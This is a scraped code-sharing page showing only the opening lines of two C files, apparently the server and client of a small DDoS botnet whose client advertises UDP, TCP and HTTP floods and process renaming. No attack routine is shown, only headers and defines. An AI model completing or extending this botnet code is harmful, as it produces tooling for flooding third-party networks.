Skip to content

Instantly share code, notes, and snippets.

// Gr1n Server.c
// Made By Gr1n 02.1.2017
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
@Gr1n1337
Gr1n1337 / Gr1n Client.c
Created January 2, 2017 19:06
Gr1n Client.c
// Client.c Made By @Gr1n1337 -
// DeepWeb Fourms User Name - Gr1n -
// This Client Only Has UDP TCP HTML -
//---------------------------------
#define PR_SET_NAME 15
#define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
#define PAD_RIGHT 1
#define PAD_ZERO 2
#define PRINT_BUF_LEN 12